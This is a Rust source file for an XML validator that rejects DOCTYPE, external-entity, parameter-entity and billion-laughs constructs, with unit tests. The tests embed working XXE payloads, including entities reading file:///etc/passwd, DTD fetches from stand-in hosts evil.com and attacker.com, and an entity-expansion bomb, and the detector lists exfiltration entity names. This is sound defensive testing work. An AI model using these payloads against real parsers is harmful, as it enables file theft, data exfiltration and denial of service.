use std::error::Error;
use std::fmt;
/// String-level screen that rejects XML input containing constructs used in
/// XXE (external entity), entity-expansion ("billion laughs") and
/// parameter-entity exfiltration attacks.
///
/// The checks are textual scans rather than an XML parse, so markers that
/// appear inside comments or CDATA sections are flagged as well.
#[derive(Debug, Clone)]
pub struct XmlSecurityValidator {
/// If `true`, `validate` rejects any input containing a `<!DOCTYPE` marker
/// (matched case-insensitively) with `SecurityViolation::DoctypeDetected`.
pub reject_doctype: bool,
/// Maximum accepted input length in bytes (as reported by `str::len`);
/// longer input is rejected with `SecurityViolation::DocumentSizeExceeded`.
pub max_document_size: usize,
/// If `true`, `validate` additionally rejects parameter entities, external
/// `SYSTEM`/`PUBLIC` references, and any `<!ENTITY` declaration.
pub strict_validation: bool,
}
impl Default for XmlSecurityValidator {
    /// Builds the restrictive configuration: DOCTYPE rejection and strict
    /// entity validation are both enabled, and input is capped at 10 MiB
    /// (10 * 1024 * 1024 bytes).
    fn default() -> Self {
        const TEN_MIB: usize = 10 * 1024 * 1024;
        Self {
            strict_validation: true,
            reject_doctype: true,
            max_document_size: TEN_MIB,
        }
    }
}
impl XmlSecurityValidator {
    /// Creates a validator with explicit settings.
    ///
    /// * `reject_doctype` - reject any input that contains a `<!DOCTYPE` marker.
    /// * `max_document_size` - maximum accepted input length, in bytes.
    /// * `strict_validation` - additionally reject parameter entities, external
    ///   `SYSTEM`/`PUBLIC` identifiers and entity declarations.
    pub fn new(reject_doctype: bool, max_document_size: usize, strict_validation: bool) -> Self {
        Self {
            reject_doctype,
            max_document_size,
            strict_validation,
        }
    }

    /// Screens `xml` for constructs used in XXE, entity-expansion
    /// ("billion laughs") and parameter-entity exfiltration attacks.
    ///
    /// This is a deliberately conservative textual scan, not an XML parse:
    /// markers inside comments, CDATA sections or character data are flagged
    /// too. Markup keywords are matched ASCII case-insensitively, a superset of
    /// the exact-case spelling the XML grammar requires.
    ///
    /// # Errors
    ///
    /// Returns the first violation found, checking in this order:
    /// 1. [`SecurityViolation::DocumentSizeExceeded`] if `xml.len()` (bytes)
    ///    exceeds `max_document_size`;
    /// 2. [`SecurityViolation::DoctypeDetected`] if `reject_doctype` is set and
    ///    a `<!DOCTYPE` marker is present;
    /// 3. when `strict_validation` is set:
    ///    [`SecurityViolation::ParameterEntityDetected`], then
    ///    [`SecurityViolation::ExternalEntityDetected`] (external entity or
    ///    external DTD subset), then
    ///    [`SecurityViolation::EntityDeclarationDetected`].
    pub fn validate(&self, xml: &str) -> Result<(), SecurityViolation> {
        if xml.len() > self.max_document_size {
            return Err(SecurityViolation::DocumentSizeExceeded {
                size: xml.len(),
                max_size: self.max_document_size,
            });
        }
        if self.reject_doctype && self.contains_doctype(xml) {
            return Err(SecurityViolation::DoctypeDetected);
        }
        if self.strict_validation {
            // Most specific check first so callers get the most precise reason.
            if self.contains_parameter_entity(xml) {
                return Err(SecurityViolation::ParameterEntityDetected);
            }
            if self.contains_external_entity(xml) {
                return Err(SecurityViolation::ExternalEntityDetected);
            }
            if self.contains_entity_declaration(xml) {
                return Err(SecurityViolation::EntityDeclarationDetected);
            }
        }
        Ok(())
    }

    /// Returns `true` if `<!DOCTYPE` (any ASCII case) occurs anywhere in `xml`.
    fn contains_doctype(&self, xml: &str) -> bool {
        Self::contains_ignore_ascii_case(xml, "<!DOCTYPE")
    }

    /// Returns `true` if the document pulls in an external resource through a
    /// `SYSTEM` or `PUBLIC` identifier, either in an entity declaration or in
    /// the DOCTYPE's external DTD subset (`<!DOCTYPE root SYSTEM "...">`).
    fn contains_external_entity(&self, xml: &str) -> bool {
        // Conservative: once any `<!ENTITY` is present, a SYSTEM/PUBLIC keyword
        // anywhere in the document is treated as an external entity.
        let external_entity =
            self.contains_entity_declaration(xml) && Self::mentions_external_id(xml);
        external_entity || Self::doctype_has_external_id(xml)
    }

    /// Returns `true` if `<!ENTITY` (any ASCII case) occurs anywhere in `xml`.
    fn contains_entity_declaration(&self, xml: &str) -> bool {
        Self::contains_ignore_ascii_case(xml, "<!ENTITY")
    }

    /// Returns `true` if `xml` declares a parameter entity (`<!ENTITY`, optional
    /// XML whitespace, then `%`) or references one of a few parameter-entity
    /// names commonly used in out-of-band XXE payloads.
    fn contains_parameter_entity(&self, xml: &str) -> bool {
        const ENTITY: &str = "<!ENTITY";
        // Entity names are case-sensitive in XML, so these are matched exactly.
        const KNOWN_REFERENCES: [&str; 5] = ["%dtd;", "%all;", "%file;", "%send;", "%eval;"];

        let mut from = 0;
        while let Some(start) = Self::find_ignore_ascii_case(xml, ENTITY, from) {
            let after = start + ENTITY.len();
            // XML allows any run of whitespace between `<!ENTITY` and `%`.
            let rest = xml[after..]
                .trim_start_matches(|c: char| matches!(c, ' ' | '\t' | '\r' | '\n'));
            if rest.starts_with('%') {
                return true;
            }
            from = after;
        }
        KNOWN_REFERENCES
            .iter()
            .any(|&reference| xml.contains(reference))
    }

    /// Returns `true` if any `<!DOCTYPE` header carries an external identifier,
    /// i.e. `SYSTEM`/`PUBLIC` appears before its internal subset or closing `>`.
    fn doctype_has_external_id(xml: &str) -> bool {
        const DOCTYPE: &str = "<!DOCTYPE";
        let mut from = 0;
        while let Some(start) = Self::find_ignore_ascii_case(xml, DOCTYPE, from) {
            let after = start + DOCTYPE.len();
            let rest = &xml[after..];
            // The ExternalID keyword precedes the internal subset `[` and the
            // closing `>`; also stopping at `<` keeps the total scan linear
            // even for adversarial runs of `<!DOCTYPE` markers.
            let header_end = rest
                .find(|c: char| matches!(c, '[' | '>' | '<'))
                .unwrap_or(rest.len());
            if Self::mentions_external_id(&rest[..header_end]) {
                return true;
            }
            from = after;
        }
        false
    }

    /// Returns `true` if `text` contains `SYSTEM` or `PUBLIC` (any ASCII case).
    fn mentions_external_id(text: &str) -> bool {
        Self::contains_ignore_ascii_case(text, "SYSTEM")
            || Self::contains_ignore_ascii_case(text, "PUBLIC")
    }

    /// Returns `true` if `needle` occurs in `haystack`, ignoring ASCII case.
    fn contains_ignore_ascii_case(haystack: &str, needle: &str) -> bool {
        Self::find_ignore_ascii_case(haystack, needle, 0).is_some()
    }

    /// Byte offset of the first ASCII case-insensitive occurrence of `needle`
    /// in `haystack` at or after byte offset `from`, without allocating.
    ///
    /// For an ASCII `needle` every match starts and ends on an ASCII byte, so
    /// the returned offset (and offset + `needle.len()`) are char boundaries.
    fn find_ignore_ascii_case(haystack: &str, needle: &str, from: usize) -> Option<usize> {
        let needle = needle.as_bytes();
        let tail = haystack.as_bytes().get(from..)?;
        if needle.is_empty() {
            // `windows(0)` would panic; an empty needle matches immediately.
            return Some(from);
        }
        tail.windows(needle.len())
            .position(|window| window.eq_ignore_ascii_case(needle))
            .map(|offset| from + offset)
    }
}
/// Reason why `XmlSecurityValidator::validate` rejected a document.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum SecurityViolation {
/// A `<!DOCTYPE` marker was found while `reject_doctype` was enabled.
DoctypeDetected,
/// A `SYSTEM`/`PUBLIC` external reference was detected (strict mode only).
ExternalEntityDetected,
/// An `<!ENTITY` declaration was found (strict mode only).
EntityDeclarationDetected,
/// A parameter-entity declaration or a well-known parameter-entity reference
/// such as `%dtd;` was found (strict mode only).
ParameterEntityDetected,
/// The input exceeded the configured byte limit.
DocumentSizeExceeded {
/// Actual input length in bytes.
size: usize,
/// The validator's configured `max_document_size`.
max_size: usize,
},
}
impl fmt::Display for SecurityViolation {
    /// Writes a one-line, human-readable explanation of the violation that
    /// names the attack class each rule is meant to block.
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        let reason: &'static str = match self {
            // The only variant with a dynamic payload is formatted directly.
            Self::DocumentSizeExceeded { size, max_size } => {
                return write!(
                    f,
                    "Document size ({} bytes) exceeds security limit ({} bytes)",
                    size, max_size
                );
            }
            Self::DoctypeDetected => {
                "DOCTYPE declarations are prohibited for security (XXE prevention)"
            }
            Self::ExternalEntityDetected => {
                "External entity references (SYSTEM/PUBLIC) are prohibited"
            }
            Self::EntityDeclarationDetected => {
                "Entity declarations are prohibited (billion laughs prevention)"
            }
            Self::ParameterEntityDetected => {
                "Parameter entities are prohibited (data exfiltration prevention)"
            }
        };
        f.write_str(reason)
    }
}
impl Error for SecurityViolation {}
#[cfg(test)]
mod tests {
    use super::*;

    /// Validator with the blanket DOCTYPE check disabled, so the strict entity
    /// checks are the ones under test.
    fn strict_without_doctype_rejection() -> XmlSecurityValidator {
        XmlSecurityValidator {
            reject_doctype: false,
            strict_validation: true,
            ..Default::default()
        }
    }

    /// Asserts that `validator` rejects `xml` with exactly `expected`.
    fn assert_rejected(validator: &XmlSecurityValidator, xml: &str, expected: SecurityViolation) {
        assert_eq!(validator.validate(xml), Err(expected));
    }

    /// Asserts that the default validator accepts `xml`.
    fn assert_accepted_by_default(xml: &str) {
        assert_eq!(XmlSecurityValidator::default().validate(xml), Ok(()));
    }

    #[test]
    fn test_validator_default() {
        let validator = XmlSecurityValidator::default();
        assert!(validator.reject_doctype);
        assert_eq!(validator.max_document_size, 10 * 1024 * 1024);
        assert!(validator.strict_validation);
    }

    #[test]
    fn test_validator_custom() {
        let validator = XmlSecurityValidator::new(false, 1024, false);
        assert!(!validator.reject_doctype);
        assert_eq!(validator.max_document_size, 1024);
        assert!(!validator.strict_validation);
    }

    #[test]
    fn test_safe_xml_passes() {
        assert_accepted_by_default(
            r#"<?xml version="1.0"?><hedl><data>safe content</data></hedl>"#,
        );
    }

    #[test]
    fn test_doctype_detection_uppercase() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_doctype_detection_lowercase() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!doctype hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_doctype_detection_mixed_case() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DoCtYpE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    // With the default settings the DOCTYPE check fires before any of the
    // strict entity checks, so every attack below reports DoctypeDetected.

    #[test]
    fn test_external_entity_system() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_external_entity_public() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe PUBLIC "publicId" "http://evil.com/evil.dtd">]>
<hedl><data>&xxe;</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_parameter_entity_attack() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<hedl>&send;</hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_billion_laughs_attack() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<hedl>&lol3;</hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_document_size_limit() {
        let validator = XmlSecurityValidator {
            max_document_size: 100,
            ..Default::default()
        };
        let large_xml = format!(
            r#"<?xml version="1.0"?><hedl><data>{}</data></hedl>"#,
            "A".repeat(200)
        );
        match validator.validate(&large_xml) {
            Err(SecurityViolation::DocumentSizeExceeded { size, max_size }) => {
                // The reported size is the byte length of the input.
                assert_eq!(size, large_xml.len());
                assert!(size > 100);
                assert_eq!(max_size, 100);
            }
            other => panic!("Expected DocumentSizeExceeded, got {:?}", other),
        }
    }

    #[test]
    fn test_disable_doctype_check() {
        let permissive = XmlSecurityValidator {
            reject_doctype: false,
            strict_validation: false,
            ..Default::default()
        };
        let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ELEMENT hedl ANY>]>
<hedl><data>test</data></hedl>"#;
        assert_eq!(permissive.validate(xml), Ok(()));
    }

    #[test]
    fn test_strict_validation_entity_detection() {
        assert_rejected(
            &strict_without_doctype_rejection(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>&test;</data></hedl>"#,
            SecurityViolation::EntityDeclarationDetected,
        );
    }

    #[test]
    fn test_strict_validation_external_entity() {
        assert_rejected(
            &strict_without_doctype_rejection(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#,
            SecurityViolation::ExternalEntityDetected,
        );
    }

    #[test]
    fn test_strict_validation_parameter_entity() {
        assert_rejected(
            &strict_without_doctype_rejection(),
            r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY % file SYSTEM "file:///etc/passwd">]>
<hedl><data>test</data></hedl>"#,
            SecurityViolation::ParameterEntityDetected,
        );
    }

    // The validator is a textual scan, not a parser: a `<!DOCTYPE` string inside
    // a comment or CDATA section is deliberately treated as a real DOCTYPE
    // (false positive preferred over a bypass). These tests pin that choice.

    #[test]
    fn test_comment_with_doctype_string() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<!-- This comment mentions <!DOCTYPE but isn't one -->
<hedl><data>safe</data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_cdata_with_doctype_string() {
        assert_rejected(
            &XmlSecurityValidator::default(),
            r#"<?xml version="1.0"?>
<hedl><data><![CDATA[<!DOCTYPE test>]]></data></hedl>"#,
            SecurityViolation::DoctypeDetected,
        );
    }

    #[test]
    fn test_security_violation_display() {
        let violation = SecurityViolation::DoctypeDetected;
        assert!(violation.to_string().contains("DOCTYPE"));
        assert!(violation.to_string().contains("XXE"));
        let violation = SecurityViolation::ExternalEntityDetected;
        assert!(violation.to_string().contains("External entity"));
        let violation = SecurityViolation::EntityDeclarationDetected;
        assert!(violation.to_string().contains("Entity declarations"));
        assert!(violation.to_string().contains("billion laughs"));
        let violation = SecurityViolation::ParameterEntityDetected;
        assert!(violation.to_string().contains("Parameter entities"));
        assert!(violation.to_string().contains("exfiltration"));
        let msg = SecurityViolation::DocumentSizeExceeded {
            size: 1000,
            max_size: 500,
        }
        .to_string();
        assert!(msg.contains("1000"));
        assert!(msg.contains("500"));
    }

    #[test]
    fn test_empty_xml() {
        assert_accepted_by_default("");
    }

    #[test]
    fn test_xml_declaration_only() {
        assert_accepted_by_default(r#"<?xml version="1.0"?>"#);
    }

    #[test]
    fn test_simple_element() {
        assert_accepted_by_default(r#"<root>test</root>"#);
    }

    #[test]
    fn test_nested_elements() {
        assert_accepted_by_default(
            r#"<?xml version="1.0"?>
<root>
<child1>value1</child1>
<child2>
<nested>value2</nested>
</child2>
</root>"#,
        );
    }

    #[test]
    fn test_attributes_allowed() {
        assert_accepted_by_default(
            r#"<?xml version="1.0"?>
<root attr1="value1" attr2="value2">
<child id="123">content</child>
</root>"#,
        );
    }

    #[test]
    fn test_unicode_content() {
        // CJK (3-byte) and emoji (4-byte) UTF-8 sequences must pass untouched.
        assert_accepted_by_default(
            r#"<?xml version="1.0" encoding="UTF-8"?>
<root>
<data>Hello 世界 🌍</data>
</root>"#,
        );
    }

    #[test]
    fn test_special_characters_escaped() {
        // Predefined entity references are ordinary content, not declarations.
        assert_accepted_by_default(
            r#"<?xml version="1.0"?>
<root>
<data>&lt;tag&gt; &amp; &quot;quoted&quot;</data>
</root>"#,
        );
    }
}